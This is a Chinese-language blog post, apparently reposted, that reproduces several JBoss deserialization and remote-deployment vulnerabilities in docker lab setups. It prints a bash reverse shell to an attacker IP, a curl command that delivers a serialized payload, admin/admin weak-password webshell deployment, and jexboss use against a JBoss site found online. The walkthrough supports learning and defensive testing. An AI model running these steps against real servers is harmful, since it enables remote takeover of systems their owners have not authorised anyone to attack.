<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    JBOSS中間件漏洞總匯復現

    VSole2021-12-27 06:43:49

    JBoss JMXInvokerServlet 反序列化漏洞

    漏洞復現

    直接使用docker搭建的漏洞環境。

    環境搭建完成后,直接使用工具檢測即可:工具下載地址https://cdn.vulhub.org/deserialization/DeserializeExploit.jar

    環境啟動以后,直接訪問http://you-ip:8080。

     

     使用下載的工具進行檢測 java -jar DeserializeExploit.jar

     

      執行命令

     

    文件管理

     

     JBoss 5.x/6.x 反序列化漏洞(CVE-2017-12149)

    參考鏈接:https://www.cnblogs.com/Hi-blog/p/7904443.html

    漏洞背景

    該漏洞為 Java反序列化錯誤類型,存在于 Jboss 的 HttpInvoker 組件中的 ReadOnlyAccessFilter 過濾器中。該過濾器在沒有進行任何安全檢查的情況下嘗試將來自客戶端的數據流進行反序列化,從而導致了漏洞。

    漏洞復現

    漏洞環境

    靶機地址:192.168.10.144 服務端口:8080

    測試機:192.168.10.150

    搭建好環境,訪問地址:

    http://192.168.1.102:8080/

    及 http://192.168.1.102:8080/invoker/readonly

     

     

     響應碼500,證明漏洞存在。

    下載漏洞利用工具:http://scan.javasec.cn/java/JavaDeserH2HC.zip

     

    先編譯:

    javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
    

      

    設置反彈的IP和端口

     

    這樣就會將序列化對象保存在ReverseShellCommonsCollectionsHashMap.ser中,用curl命令發送到Jboss服務地址。

    先在測試機運行nc命令,進入監聽模式:

    再打開另一個控制臺,運行如下curl命令:

    反彈成功

     

     JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504)

    前言

    序列化就是把對象轉換成字節流,便于保存在內存、文件、數據庫中;反序列化即逆過程,由字節流還原成對象。Java中的ObjectOutputStream類的writeObject()方法可以實現序列化,ObjectInputStream類的readObject()方法用于反序列化。問題的根源在于類ObjectInputStream在反序列化時,沒有對生成的對象的類型做限制。

      

    漏洞環境

    此次環境嘗試用docker搭建。

    靶機:

    ip:192.168.10.144   操作系統:ubuntu18.0.4 LTS

    攻擊機:

    ip:192.168.10.150   操作系統:kali

    一、環境搭建

    1.docker的安裝參考

    https://www.howtoing.com/ubuntu-docker

    2.安裝完docker后,直接拉取vulhub的源碼。

    https://github.com/vulhub/vulhub/tree/master/jboss/CVE-2017-7504

    3.靶機啟動服務

    執行如下命令啟動JBoss AS 4.0.5

    docker-compose up -d

     4.環境啟動后,地址為http://192.168.112.132:8080/

     

    漏洞復現

    一、exp準備:

    • https://github.com/joaomatosf/JavaDeserH2HC

    用法:

     

    二、exploit

    1) 選擇ExampleCommonsCollections1WithHashMap,編譯并生成序列化數據

     

    javac -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap.java   #編譯

      java -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap "bash -i >& /dev/tcp/192.168.10.150/1234 0>&1"      #ser全稱serialize,序列化惡意數據至文件。  

       第一行命令執行完成后,將生成一個文件ExampleCommonsCollections1WithHashMap.class

       第二行命令執行完成后,將生成一個文件ExampleCommonsCollections1WithHashMap.ser

     

     2)發射:

      將該文件作為請求數據主體發送如下數據包:curl http://192.168.10.144:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @ExampleCommonsCollections1WithHashMap.ser # --data-binary 意為以二進制的方式post數據

     

      反彈成功

     

    JBoss遠程部署漏洞

    參考鏈接:https://www.cnblogs.com/Safe3/archive/2010/01/08/1642371.html

    漏洞產生

    后端未對用戶可控參數做嚴格的過濾。

    漏洞危害

    導致任意命令執行,入侵者可以利用此漏洞直接獲取webshell,進而對整個服務器進行控制。

    漏洞復現

    直接使用docker搭建的漏洞環境。

    訪問:http://you-ip:8080/

     

     

      點擊,訪問后臺 使用弱口令登陸(admin--admin)

     

     

      進入后臺,如圖所示

     

     

     找到如下圖所示的入口,點擊進入

     

     

    找到這個入口

     

     

    在輸入框中寫入war壓縮文件webshell的url地址,如上圖

    點擊invoke執行界面獲得一個jsp的webshell,(沒有合適的jsp包)

    使用kali復現

    參考鏈接:https://blog.csdn.net/u011215939/article/details/79141624

    所需工具:kallinux,jexboss,

    獲取工具:打開kalilinux,在kali終端中輸入以下命令:

     

     下載完成

     

     運行 python jexboss.py

     檢驗是否能夠執行,可以執行就是如下:

     

     找一個jboos的網站,如圖所示

     將這個IP:8080復制到kalilinux中使用jexboss工具進行檢測;

     

    執行,工具會依次檢測一下項目,有漏洞就會顯示紅色的:VULNERABLE(易受攻擊的),工具就會根據找到容易受到攻擊的點,進行利用

     

     然后選擇yes,開始創建連接;

     

     返回信息顯示連接成功了;

     

     現在獲取了shell,開始執行shell命令了;返回的信息顯示,這是一個linux操作系統;

     

    執行幾條命令看看;root權限 


    序列化jboss
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    干貨|最全的Jboss漏洞復現筆記
    JBoss核心服務不包括支持servlet/JSP的WEB容器,一般與Tomcat或Jetty綁定使用。在J2EE應用服務器領域,JBoss是發展最為迅速的應用服務器。
    JBoss是一個基于J2EE的開放源代碼應用服務器,代碼遵循LGPL許可,可以在任何商業應用中免費使用;JBoss也是一個管理EJB的容器和服務器,支持EJB 1.1、EJB 2.0和EJB3規范。但JBoss核心服務不包括支持servlet/JSP的WEB容器,一般與Tomcat或Jetty綁定使用。在J2EE應用服務器領域,JBoss是發展最為迅速的應用服務器。由于JBoss遵循商業友好的LG
    該漏洞位于JBoss的HttpInvoker組件中的 ReadOnlyAccessFilter 過濾器中,其doFilter方法在沒有進行任何安全檢查和限制的情況下嘗試將來自客戶端的序列化數據流進行反序列化,導致攻擊者可以通過精心設計的序列化數據來執行任意代碼。 但有安全研究者發現JBOSSAS 6.x也受該漏洞影響,攻擊者利用該漏洞無需用戶驗證在系統上執行任意命令,獲得服務器的控制權。
    0x03 單機信息搜集tasklist /svc命令將獲取到的進程列表與本地殺軟進程進行對比后發現存在:ZhuDongFangYu.exe、aliyundun.exe、aliyun_assist_service.exe等進程。netstat -ano命令下發現1433、3389是開著的,但由于這臺主機為內網,而且存在360主動防御,所以暫時無法實現文件落地、執行添加/修改用戶密碼、端口轉發等操作。
    接到一個緊急測試任務,只有一個目標名稱和一個ip。這樣的話webshell的url就無法正常訪問了)帶上cookie即可正常連接。連接成功后,為了穩定webshell,我們嘗試將webshell寫入到根目錄和靜態文件的目錄,但是仍會受到強制跳轉的影響。于是將webshell內容寫入到了在登陸前就能訪問的jsp正常文件中,來穩定shell。
    0x00 前言這次滲透測試是從一個CVE開始的,從CVE到內網然后到域控!首先對發現了該站點有JBoss頁面,經過測試發現具有JBoss序列化漏洞。使用網上提供的EXP和利用方法,在VPS上面獲取了一個shell。
    一次完整的滲透測試
    2021-11-19 15:35:41
    滲透測試中,Web端最常見的問題大多出現在弱口令、文件上傳、未授權、任意文件讀取、反序列化、模版漏洞等方面。因此,我們著重圍繞這些方面進行滲透。
    如何攻擊Java Web應用
    2021-08-23 11:06:00
    本文從黑盒滲透的角度,總結下Java Web應用所知道的一些可能被利用的入侵點。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类